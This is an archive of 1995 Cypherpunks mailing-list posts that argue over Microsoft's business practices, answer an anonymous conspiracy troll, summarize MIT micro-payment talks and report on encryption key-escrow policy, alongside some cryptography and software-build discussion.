undocumented entry points in their OS and Windows products.  These entry
points allow MS apps to do some things more efficiently than a
competitor which uses the published API.  MS has been known to
rearrange these undocumented calls, resulting in sudden
incompatibilities with competitors.  (remember when Win3.1 came out and
DR-DOS was suddenly unable to run Windows?)  And in the MS countersuit
against Stac Electronics, MS successfully argued that undocumented
system calls were protected as Trade Secret material.

While this isn't the grand-scale conspiracy some people seem to see,
IMHO it's still predatory.  Perhaps the call to separate the OS and apps
divisions is a good idea.  It would be interesting to see if Microsoft
could maintain its edge in applications when it had no sub rosa
advantage in OS access.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNlXShvikii9febJAQFoGgP/YtHdGqO8++MfZmk3h61F8SmJBfPYfa1R
JlccdIP9BZHVXZseao9b9DqxLY1xRYkK6fWETielJaSjXZKam1WlYKFzL5E8Hf1z
IXQmj7rCIIfvqvq3byJq8B3IUbT4UnTMNDAHVlNUwkzrcJ+py8czsWtNy15g3ahY
NzYL8UsOtwI=
=MpV3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 21 Dec 95 04:39:15 PST
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Gates history
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <9512211235.AA29804@all.net>
MIME-Version: 1.0
Content-Type: text


Not that this subject matter is relevent to cypherounks, but...

> cpunk relevance: operation of the free market
???

> Gates' conquests can either be made out to be a failure of the free enterprise 
> system or a success from it. the more I read whining complaints about MS's
> dominance, the more I prefer the latter interpretation. perhaps power 
> corrupts, but on the other hand failure clearly promotes whining. "you cannot
> grow taller by chopping off the heads of others".

I respectfully disagree with the analogy.  In a competitive market
economy, you can indeed grow larger by killing off the competition.  In
fact, that's the whole idea of unfettered capitolism.  This was tried
100 years ago and the result was monopolies which in the end eliminated
competition and ended up reducing innovation and productivity while
increasing prices.  Then the US government decided to end this by
introducing laws to limit monopolies.  The broke up AT+T and essentially
forced IBM to become weak in the name of fairness, but when Bill Gates
brought Microsoft into the same position, the government failed to act
(and is continuing to do so).  This is (in my opinion) because Ron
Raegan was so influential as president and heavily favored unfettered
free trade. 

> I've seen so many people try to smear MS with innuendo, as if "enough people
> being unhappy" at a company is ample evidence that there is "unfairness".
> the marketplace is *not* fair. it rewards people who are in tune with it
> disproportionately!! sometimes, *dramatically*so* as in the case with Gates.

Inuendo or not, there are clear facts that have been widely documented
regarding Microsoft (Bill Gates doesn't run it alone you know!).  Among
them are:

	- Microsoft forces dealers to buy only Microsoft software bundles
	if they want to use ANY microsoft products in their PCs at discount
	prices.

		I have been personally caught in this one.  I had a calendar
		product a few years back that was marketed to about 1,000 of
		the largest microcomputer dealers and bundlers in the US.  Not
		one would buy the product, and the reason they gave was that
		they were not allowed to bundle any non-Microsoft-approved
		software without losing their ability to sell the Microsoft
		bundles.

		This is not a case of sour grapes - it's just plan fact. That
		is what the dealers said - not just one of them.

	- Microsoft has historically used undocumented operating system calls
	which they provided details on to select software companies and which
	they used for their own products, but which they did not release
	to the greater market place.  Without the use of these undocumented calls,
	many operating system features were not usable.

		The net effect was that companies not on the Microsoft chosen list
		were delayed in delivering new versions of products to meet new
		versions of operating systems, giving Microsoft and companies they
		worked with a market advantage.

	- Microsoft holds a dominant market position.

		This is a necessary component of the situation because if the
		same facts held for a non-dominant company, it would be within
		bounds of the law and would not stifle free trade.	

> a market for [x] gizmos does not even exist. a brilliant
> person says, " I think people really need [x] gizmos. I'm going to make and
> sell them. I'm going to find people who will help me, but if I can't find any
> I'm going to do it all myself".

Nobody is disagreeing with this.  That is the desirable part of what
Gates and Microsoft did - 20 years ago.  But the standards we hold and
the requirements we place on companies increase with their size and
market dominance.  This is done in the name of keeping a thriving
competitive environment.  In today's environment, Microsoft is
dominating the market and thus reducing innovation (or so the theory
goes) by using anticompetitive methods, and that is the issue.

	In my personal opinion, they are doing something far worse.  By
	dominating the market with inferior products, they are essentially
	forcing the world to build an artificially weakenned global network
	environment.  The net effect will be years of new versions of the
	Microsoft product line without a single bug fix (they call them
	feature enhancements).

> Gates is such a person and did it with PC OS'es and various windows 
> applications (Excel, Word Perfect, etc.). he bet his entire future on
> the idea that he knew what people wanted even when other companies disagreed.

This is factually inaccurate.

	Microsoft created inferior versions of existing products that
	have only come to market dominance because of anticompetitive
	methods.  For example, Excel has numerour bugs and produces
	wrong answers at a rate far in excess of 123.  It is truly an
	inferior product, and yet it now dominates the market - solely
	because it is bundled with other microsoft products and because
	interoperation between 123 and Microsoft products is delayed due
	to undocumented features and changes in the underlying Microsoft
	operating system. 

	Microsoft did not bet its fortune, nor did Bill Gates, on Excel,
	WordPerfect, or any other of their applications.  With a few
	exceptions, they took existing products, built their own versions,
	used inside information and their dominant market position to force
	the products on PC dealers, and continue to do so.

...
> the truth is that the playing field has always been level, but because Gates
> is  such a brilliant genius, market anticipator, and gizmo producer, he
> succeeds far beyond his or anyone else's wildest dreams.

It's just not accurate.  IBM, until recently, was barred from selling more than
a certain dollar value worth of units.  Bill Gates didn't build Microsoft alone
either.  He has thousands of employees.  Admitidly he was a driving force, but
his team members are largely responsible for his success, and I think he would
readily agree to this if you asked him.

> the market has *given* bill gates his dominance. all the arguments about
> him being "unfair" are absolutely bogus that I have seen. they amount to,
> "Bill Gates is using tactics to sell more of his software than his competitors.
> therefore, he's not being fair to everyone else who wants to sell their
> software as well."

That's not what people are saying.  They are saying that Microsoft is
breaking the law of the land and has been for a long time and that is
why they have market dominance.  Whether the law has been broken or not,
you are mischaracterizing what has been said about Microsoft.

Enough of this - sorry for the noise, and let's get back to what
cypherpunks are about - cyphers.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 21 Dec 95 08:34:44 PST
To: Jeff Weinstein <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512211634.IAA22811@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>ECafe Anonymous Remailer wrote:
(A bunch of ridiculous nonsense)

At 01:48 AM 12/21/95 -0800, Jeff Weinstein wrote:
>  I am against GAK.  I have been contributing to [...]

Please do not reply to silly trolls.  By replying, you 
act as if what this loon said mattered.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 21 Dec 95 05:29:49 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <951221083022.2460067b@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> MIT is practically floating on government subsidies.

   It's funny how the grass is always greener somewhere else...

                           Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Thu, 21 Dec 95 08:52:59 PST
To: roy@cybrspc.mn.org
Subject: Re: Microsoft Flame[tm] [NOISE]
Message-ID: <m0tSoES-000RuKC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:32 AM 12/21/95 CST, Roy M. Silvernail wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>There's a lot of finger waving going on over Microsoft's alleged
>predatory practices.  I just want to remind the pro-MS folks of
>something.  Microsoft has a documented track record of using
>undocumented entry points in their OS and Windows products.  These entry
>points allow MS apps to do some things more efficiently than a
[snip]
>
>While this isn't the grand-scale conspiracy some people seem to see,
>IMHO it's still predatory.  Perhaps the call to separate the OS and apps
>divisions is a good idea.  It would be interesting to see if Microsoft
>could maintain its edge in applications when it had no sub rosa
>advantage in OS access.

IMHO, I see nothing wrong with predatory behavior.. then again, I hunt in
the fall, so it must be a redneck thing..

MS and any of the other software companies are competing for domination in a
narrow field.. MS just happens to be the only real choice for OS anymore..
well, for a standard, out of the box OS anyways. The fact that they have to
leave in undisclosed hooks to get their own software to excell over others
just points to the poor software they produce overall. 

I have to admit that I like, possibly admire, the way the Bill and crew have
captured the market.. from a marketing standpoint, they did a first rate job
of running with the ball until there was no pursuit.. Sure, from time to
time, someone tries to throw a blocker in thier path, but they just overrun
it and keep going.. Forget about the monopoly aspects for a second and look
at MS as an American success story. It has all the classic elements: started
small, with a crew of social misfits and eventually grew up.

Just a few cents worth..
RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Dec 95 09:10:01 PST
To: blancw@accessone.com
Subject: Re: FTC Privacy Initiative (fwd)
In-Reply-To: <9512210144.AA04101@pulm1.accessone.com>
Message-ID: <199512211704.JAA12536@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	"Hey, we can't just stand around here with nothing to do.
> 	Give us something to regulate - anything, pro or con; we
> 	must regulate something."

	Gah. Just what we need, a law to do what technology can do
better. Sometime early next year community connexion will be running
an anonymizing web proxy, located on high bandwidth pipes to major
interchange points. Stay tuned.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 06:34:10 PST
To: hallam@w3.org
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <9512210012.AA19612@zorch.w3.org>
Message-ID: <199512211432.JAA00971@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> On the one hand we have the screaming libertarians with a bunch of 
> wedged political notions about property. On the other we have what 
> appear to be arch anti-capitalists claiming that nobody who earns
> a living out of crypto can be a cypherpunk. What is really strange
> is that these appear to be the _same_ people.

No, Phil. We have just one person who's an annoying nutcase who's been
bothering us, and lord knows what he really thinks.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 06:37:17 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <199512211437.JAA00982@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rolling on floor...

.pm

ECafe Anonymous Remailer writes:
> I'm not trying to start a flame war, just telling
> people what's REALLY happening.
[...]
> ATT and Netscape are both tools of the CIA/NSA.
[...]
> Evidently the cypherpunks are all too impressed
> with Blaze and Weinstein's master degrees to see
> what's really happening.  Only true visionaries
> like myself and Dr. Frederic B Cohen are telling
> it like it is;
[...]
> It's amazing how clear everything becomes once
> one stops taking the medication that THEY prescribed.
> 
> s/ Bill Gates




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 21 Dec 95 06:50:04 PST
To: John Young <jya@pipeline.com>
Subject: Re: KOD
In-Reply-To: <199512202258.RAA13656@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951221093459.4338t-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, John Young wrote:

> >Can you reveal who they are?  No way am I going to buy 
> >Newsweek to  find out.
> 
> Anyone out of Newsweek's range, return this msg, empty, to me 
> to get the 50 mugshots, then ... sort out the living from the 
> dead.

I send for copies of John's articles almost every day (thanks, John).
I was fooled this time because the reply codes are ALWAYS of the form
AAA_bbb, and this time it was just AAA.  It went right by me.  There
must be a psychology lesson in here somewhere.

So did Pipeline finally upgrade their software, or what?

> Best not to cypherdunk the already nym-shot victims. Privacy is 
> paramount, bellows this list, no?

Um, sure, John.

Cypherpunk relevance: There's apparently an encrypted message in
John's last paragraph above.  A free T-shirt to the first person to
find it.

   --D.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 21 Dec 95 10:08:05 PST
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512210440.XAA28196@crypto.com>
Message-ID: <9512211806.AA23346@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Matt Blaze writes:
> [...]
> I'm not sure exactly what problem you're having, but the most common
> CFS-Linux problem that people complain about has to do with the rpcgen
> output not being in the format expected by the rest of CFS.  There
> seem to be two things you can do about this:  get a version of rpcgen
> that generates the "standard" (original Sun) names for the functions it
> generates, or just grab the rpcgen output from the cfs-users mailing list
> archive ("echo help | mail cfs-users-request@research att.com" for details).

You can get the original Sun ONC RPC 4.0 code, including rpcgen, from:

    ftp://bcm.tmc.edu/nfs/rpc_40.*

It also used to be at:

    ftp://wuarchive.wustl.edu/systems/sun/sun-exchange/rpc4.0

but this server is so busy that I can't verify this URL right now.

> NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
> I hereby admit that I'm a commie-fascist brainwashed sold out member of the
> military-industrial complex who has been programmed by his masters to
> infiltrate the cypherpunks in order to sap and impurify their precious
> bodily fluids.

You left out the part about helping to cover up the UFO abductions...

- --
Martin Janzen           janzen@idacom.hp.com
Pegasus Systems Group   c/o Hewlett-Packard, IDACOM Telecom Operation

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNmh+G3Fsi8cupgZAQFQ6AP/dHlQpig999yDQ8fY3yD3w9ZcKVTGCweU
M96oqf5aDltwRp9pMMRp5+5DsajRQoRdtMPhyDWMogkE7/zmMK8RGJlcJ0Z4j0Yi
3brRblzCwIjjSnwTrlPeoccmdrlLiUhisVn7iZknwGzJdmLFutR3TzW+ht08YKHq
6m9MBhQ8MTw=
=pYLf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 21 Dec 95 02:17:27 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512211018.KAA02190@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I was not interested in starting a flame but
I seem to have ignited one. I'm sorry about that.

Since almost nobody sees these people from big
corps as having a conflict of interest by being here
I am willing to drop the subject having raised
the point. It just seemed funny to me that
cypherPUNKS would be so happy to have these
fortune 500 types running the show. I guess
I see the point that these people have something
to contribute as long as they are honest about who
they are. I have to say it rubs me wrong though.

Like I said I've written a lot of code in my day
and many of you are probably running some of it
while you read this (enough said).

I just don't want to depend on att or
netscape to protect me. Even if they
do a good job the cost of using their
stuff is too high (for example the
fine print in that att product).

Lets write our own code and gpl it
so no one can take it away!

s/ Bill Gates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 21 Dec 95 10:29:06 PST
To: cypherpunks@toad.com
Subject: Re: Bit Commitment Query
Message-ID: <199512211827.KAA16701@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


For Robbie Gates, I agree that the bit commitment he describes seems
more complicated than necessary.  The simpler one, where you just hash
(R,b), is the one I have seen used.  I suggest asking on sci.crypt.
Bruce Schneier and many other good cryptographers read that group.

For Futplex, the idea of using a block encryption algorithm in a 
similar way, encrypting (R,b) with a secret key K, and later revealing
K, is a little questionable because block encryption algorithms are not
designed to avoid collisions in the same way hashes are.  Futplex
suggests that it should be hard to find two keys K_1 and K_2 such that
E_K_1(R, b1) = E_K_2(R, b2) where b1<>b2.  But this is not necessarily
true.  A cryptosystem might have the property, say, that complementing
the key is equivalent to complementing bit 0 of the plaintext.  DES has
some simple complementation properties (although not this one).  Unless
you can show that a cipher with this property is inherently weak then
it is not a valid assumption that a cipher won't have this property.

There is some literature on creating hash functions out of block ciphers.
The two are really not interchangeable.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 21 Dec 95 10:52:58 PST
To: RobL <robl@on-ramp.ior.com>
Subject: Re: Microsoft Flame[tm] [NOISE]
Message-ID: <m0tSpkY-0008ynC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


 Forget about the monopoly aspects for a second and look
>at MS as an American success story. It has all the classic elements: started
>small, with a crew of social misfits and eventually grew up.

>RobL
>------------------|-----------------------------------------------------------
>Rob Lowry         |                   
>PO Box 288        | 
>Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com


Well, I disagree.  Microsoft succeeded  primarily because it was "chosen" by
IBM in about 1981 or so, needing an OS for their PC.  MS didn't even write
it; Seattle Computer did, and that was a port of CP/M.  Not much creativity.
MSDOS revisions 1.0 and 1.1 were pure crap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: james@sparta.lcs.mit.edu (James W. O'Toole Jr.)
Date: Thu, 21 Dec 95 08:01:10 PST
To: dcsb@ai.mit.edu
Subject: brief review of MIT 12/15/95 "micro-commerce" talks
Message-ID: <9512211605.AA17350@sparta.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



This is a quick summary of the Friday 12/15/95 talks at MIT on
micro-commerce:

Millicent	--- Mark Manasse, Digital Equipment Corporation
	Brokers purchase "scrip" in large batches from vendors;
	users purchase scrip small batches from brokers;
	users give small scrip to vendors in each purchase transaction.
	"Scrip" is vendor-specific and its validity can be efficiently
	verified using hashing.  No public-key crypto is required
	to carry out the protocols, because pairwise trust relationships
	between user and broker, and between broker and vendor, are
	established and these pairs share secrets.


PayWord		--- Ron Rivest, MIT
	Users are issued certificates by brokers, indicating that
	the broker will extend credit to the user.
	Users generate long hash-chains by repeatedly hashing a
	random seed value to obtain a hash-chain root.  Then the user
	promises to a specific vendor that he will pay one cent per
	element of that hash-chain.  This promise is made by the user
	signing (using PKC) the root of the hash chain.
	Each time the user wants to pay one cent to the vendor, she
	sends another element of the hash-chain, working backwards from
	the root, as in the S/Key system.  The vendor redeems the whole
	chain (or whatever portion the user has spent) by sending the
	user's signed promise and the last spent element of the chain
	to the broker.


MicroMint	--- Adi Shamir
	A scheme for issuing coins that is much more like traditional
	physical coin systems in that forgery and cheating are possible,
	but only practical on a large scale, and are detectable and can be
	combatted.  A "coin" in the MicroMint system is a set of 4 values
	that hash to the same value.  Producing such 4-way-colliding values
	is much less expensive in bulk than individually.  The mint produces
	coins in bulk and will redeem them into cash.  To combat active
	forgers, the mint can embed secrets in the coins and reveal the
	secrets	progressively so that vendors can detect forged coins
	cheaply.


Lightweight Signatures for Revocation	--- Silvio Micali, MIT
	A cost/performance analysis of the key revocation system for the
	U.S. Federal Goverment's Public Key Infrastructure.  Taking a
	MITRE-designed plan as a starting point, the communications costs
	are analyzed.  In the MITRE plan, the certification authorities issue
	revocation lists on a semi-weekly or daily basis, these lists being
	then stored in an untrusted and highly replicated database.  When
	a public key is being checked, the receiver queries the database
	to determine the status of the public-key.  In the talk, Silvio
	showed how lightweight signatures can be used to reduce the size
	(and therefore transmission cost) of the revocation lists.
	He also showed that transmission costs can be dramatically
	reduced by not sending large revocation lists in response to queries.
	Instead, the replicated database can store a timestamped
	key-status-report (signed by the certification authority) for
	every single key.  This key-status-report is much smaller than
	the full revocation list.

Overall, the PayWord scheme is probably the one to watch for actual use
on the Internet.  Millicent has an advantage of not using PKC, but
PayWord may be simpler to implement and is being discussed in the WWW
Consortiom and the IETF as a possible draft standard.  It is also worth
noting that PayWord operates essentially by combining a
PKC-signature-based authentication (between user and broker) with a
One-Time-Password (OTP) authentication scheme (as in the S/Key system).
OTP has been getting standardized recently on the Internet and maybe
that will help too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 08:05:48 PST
To: cypherpunks@toad.com
Subject: Encryption Rules Coming
Message-ID: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, December 21, 1995, p. 4.


   Encryption rules to be prepared

   By Andrew Jack in Paris

   Representatives of international business and government
   yesterday agreed to draw up guidelines on encryption, a
   system which allows computer users to transmit information
   electronically with little risk that it can be intercepted
   and understood by unauthorised "hackers".

   The meeting, which was held at the International Chamber of
   Commerce in Paris, could lead to formal propositions
   prepared jointly by business and government organisations
   that could be ready by as soon as next summer.

   Yesterday's meeting did not have any formal legal
   authority, but was highly significant as the first forum
   where so many representatives of governments businesses and
   computer experts met to discuss developments in encryption.

   Highly sophisticated encryption technology already exists
   in a number of countries including the US and Sweden. In
   the US, companies already have access to these programs. A
   growing number of businesses -- led by the banking sector
   -- are demanding access to these programs.

   However, many governments, including that of the US, have
   resisted permitting the technology to be exported because
   they fear it will fall into the hands of organised crime
   and terrorist organisations.

   They have demanded that they should be able to "hack" into
   computer transmissions for counter-intelligence and
   criminal investigation work, in the same way that they can
   conduct telephone-tapping exercises.

   An important conclusion of yesterday's Paris meeting was
   that business agreed in principle to allow such hacking to
   take place as long as sufficient safeguards were in place
   and "electronic search warrants" had been issued with
   proper judicial approval.

   A number of governments appear willing to permit relaxation
   of export controls on sophisticated encryption devices as
   long as these safeguards are in place.

   Among the issues that experts on both sides need to resolve
   are the ways in which "keys" allowing computer
   transmissions to be decoded would be handled.

   A number of business organisations have discussed the use
   of third-party organisations, which would be independent of
   government, would have the keys and would hand them over to
   government investigators when demands were justified.

   However, the organisations still have to resolve a number
   of issues, including how these custodians could be made
   legally liable for any unauthorised access to this
   information and for the costs of its misuse.

   [End]

----------

   Does anyone have press reports or more information on this 
   meeting? Any connection to the recently signed Transatlantic
   Agenda?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "neB .veR" <samman-ben@CS.YALE.EDU>
Date: Thu, 21 Dec 95 08:07:30 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951221093459.4338t-100000@goya>
Message-ID: <Pine.A32.3.91.951221110522.2762A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, David Mandl wrote:

> > Best not to cypherdunk the already nym-shot victims. Privacy is 
> > paramount, bellows this list, no?
> 
> Um, sure, John.
> 
> Cypherpunk relevance: There's apparently an encrypted message in
> John's last paragraph above.  A free T-shirt to the first person to
> find it.

Um....I think that's just his writing style.


Ben.

PS: I've just finished the first copy of a zero-knowledge client/server 
application.  Its really basic--I'll be adding BBS to it RSN.  IF you 
want it, mail me.

PPS: There's no crypto--just Fiat-Feige-Shamir ZKIPofI.  Can I export this?

____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 21 Dec 95 09:15:04 PST
To: cypherpunks@toad.com
Subject: Encryption Rules Coming
In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
Message-ID: <9512211714.AA08868@alpha>
MIME-Version: 1.0
Content-Type: text/plain



 >    Financial Times, December 21, 1995, p. 4.
 > 
 >    However, many governments, including that of the US, have
 >    resisted permitting the technology to be exported because
 >    they fear it will fall into the hands of organised crime
 >    and terrorist organisations.

I am forced to wonder whether the people who type in stories like this
are conscious while they do so.  Replace "the technology" with
"pistols" in the above paragraph; it doesn't make any sense unless you
assume there are no organized crime or terrorist organizations in the
US, or that such organizations can only acquire things that pass
through national borders.  Are news editors so technophobic that they
assume there must be something they just "don't get"?


On a vaguely related note, I saw a quick preview for an episode of
"The Client".  The episode was supposed to be about Internet child
molesters (who I suppose are the ones that know the secret
"meta-alt-ctrl" sequence that causes the innocent victims on the other
end of the wire to be abused via modem).  Anybody see it?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 21 Dec 95 11:25:50 PST
To: cypherpunks@toad.com
Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512211924.LAA21493@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of other's efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth.

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company who's Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned site better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





